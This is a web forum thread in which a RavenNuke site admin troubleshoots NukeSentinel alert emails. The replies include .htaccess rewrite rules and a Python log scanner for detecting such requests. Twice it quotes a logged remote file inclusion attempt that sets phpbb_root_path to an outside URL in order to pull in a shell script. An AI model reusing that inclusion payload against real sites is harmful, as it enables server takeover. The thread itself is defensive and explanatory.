hamrdeye
Hangin' Around


Joined: Aug 20, 2008
Posts: 28

Posted: Tue Sep 29, 2009 2:59 pm

I keep getting tons of these emails emailed to my admin account on our website. I recently updated to Raven Nuke from 8.1 phpnuke. I am getting like 10 a day, and I am not sure what is wrong as I am having difficulty understanding the message.

I can't paste the message here; I am getting "The resource/content requested is not in an acceptable format."

How can I supply the email?
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 5996

Posted: Tue Sep 29, 2009 3:10 pm

Just paste the main text message from the email. It doesn't need to contain any formatting.

That said, without knowing what types of messages you're getting (i.e. which blockers are being triggered), are you using request method or string blockers? Also, harvester and referer blocks can be triggered frequently if these happen on your sites.

For some blocks, you may wish NOT to receive an email. For example, harvesters and referers are blocked before they can do anything on your site, so you probably don't need an email every time they visit. To turn off emails, just change the Activate setting for these blockers to something that does not include email.
hamrdeye
Hangin' Around


Joined: Aug 20, 2008
Posts: 28

Posted: Tue Sep 29, 2009 8:24 pm

The message is from: Mail Delivery System
With a subject of: Mail delivery failed: returning message to sender

So it's like my site is trying to send something, but yet the email is from Nuke Sentinel.


I will attempt to paste again...

Code:
This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

 

    Unrouteable address

------ This is a copy of the message, including all the headers. ------

Return-path: <dofadmin@teamdof.com>
Received: from teamdof by server307.serverquality.com with local (Exim 4.69)
(envelope-from <dofadmin@teamdof.com>)
id 1MsXzO-0002JD-Et
for
; Tue, 29 Sep 2009 03:23:14 -0500
To: e <w@server307.serverquality.com>
Subject: Blocked abuse from 195.186.64.229
From:

Reply-To:

Date: Tue, 29 Sep 2009 03:23:14 -0500
X-LibVersion: 3.3.2_4
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Message-ID: <20090929082314.8877.622664592.swift@www.teamdof.com>
X-ServerQuality-MailScanner-Information: Please contact the ISP for more information
X-ServerQuality-MailScanner-ID: 1MsXzO-0002JD-Et
X-ServerQuality-MailScanner: Found to be clean
X-ServerQuality-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
score=-2.6, required 7, autolearn=not spam, BAYES_00 -2.60,
NO_RELAYS -0.00)
X-ServerQuality-MailScanner-From:

X-Spam-Status: No

Created By: NukeSentinel(tm) 2.6.02
Date & Time: 2009-09-29 03:23:14 CDT GMT -0500
Blocked IP: 195.186.64.229
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/5.0
HTTP Host:

Script Name: /modules.php
Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???
Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 195.186.64.229
Remote Port: 9463
Request Method: GET


Ok I had to add spaces to the Query String and Get String lines for the forum to allow the post..

I have got 15 of these so far today..

I do get emails to my admin account regarding blocked IPs, but not this frequently.. I have no idea where the "w@server307.serverquality.com" is from...????
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3028
Location: United Kingdom

Posted: Wed Sep 30, 2009 12:21 am

Well, it looks like someone has been attempting to hack your site, but NS has blocked them.

Check the email address set in your NS admin panel.
kd8hho
Worker


Joined: Mar 30, 2009
Posts: 105

Posted: Wed Sep 30, 2009 4:38 pm

Code:

Referer: none
User Agent: Mozilla/5.0
HTTP Host:

Script Name: /modules.php
Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???
Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 195.186.64.229
Remote Port: 9463
Request Method: GET


I get that a lot. IIRC it's trying to upload a shell script into your site. I think I block 5 to 10 a day myself.

Make sure your e-mail is set right in NS admin, as jakec said.
hamrdeye
Hangin' Around


Joined: Aug 20, 2008
Posts: 28

Posted: Wed Sep 30, 2009 10:45 pm

Well the email was set wrong in NS.. I changed it. I think that stopped it.. Will report if it didn't..

Thanks for the help...

BTW - Should NS be blocking the offending IPs? Cause I have nothing in my blocked IP list. I have changed the permissions to 666 and the path appears to be right in NS prefs. Is there something else I need to do?
slackervaara
Worker


Joined: Aug 26, 2007
Posts: 234

Posted: Wed Sep 30, 2009 11:42 pm

If you add these lines in your .htaccess these types of hacks will be blocked prior to Sentinel and you will then not get any more of these emails:

# Return 403 Forbidden for any request line containing http://, literal or URL-encoded
RewriteEngine On
RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]
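An added example, not code from the thread or from NukeSentinel: a Python access-log check for the pattern the .htaccess rule above targets (a remote URL passed in a query parameter), which percent-decodes and ignores case before matching and also covers https and ftp. The log lines, IPs and example.net host are constructed, and treating a 403 status as "blocked" is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines in Apache combined-log style (documentation IPs,
# example.net host); the first mirrors the request quoted in the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Sep/2009:03:23:14 -0500] "GET /modules.php?name=Stories_Archive//arcade.php?phpbb_root_path=http://files.example.net/a.txt??? HTTP/1.1" 403 210
198.51.100.8 - - [29/Sep/2009:03:25:02 -0500] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 8123
198.51.100.9 - - [29/Sep/2009:03:26:40 -0500] "GET /index.php?page=HTTPS%3a%2f%2ffiles.example.net%2Fa.txt HTTP/1.1" 200 512
198.51.100.10 - - [29/Sep/2009:03:27:11 -0500] "GET /index.php?id=4&page=http%253A%252F%252Ffiles.example.net HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_URL_RE = re.compile(r"(?:https?|ftps?)://", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return one finding per request with a remote URL in a parameter value."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, _method, target, status = match.groups()
        pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        params = [k for k, v in pairs if REMOTE_URL_RE.search(decode_fully(v))]
        if params:
            findings.append({"ip": ip, "params": params,
                             "blocked": status == "403"})
    return findings


def served(findings):
    """Requests that matched but were not answered with 403 need review."""
    return [f["ip"] for f in findings if not f["blocked"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests returned by `served()` reached the application and are the ones to check against the Sentinel blocker settings and the rewrite rules.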
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3028
Location: United Kingdom

Posted: Thu Oct 01, 2009 12:21 am

Blocked IPs are saved in two places, the database and the .htaccess file. If this is not happening, make sure the blocker settings are set correctly in NS.
hamrdeye
Hangin' Around


Joined: Aug 20, 2008
Posts: 28

Posted: Thu Oct 01, 2009 10:17 am

It was the blocker settings. I will add the code to my .htaccess file also..

Thanks!
All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven
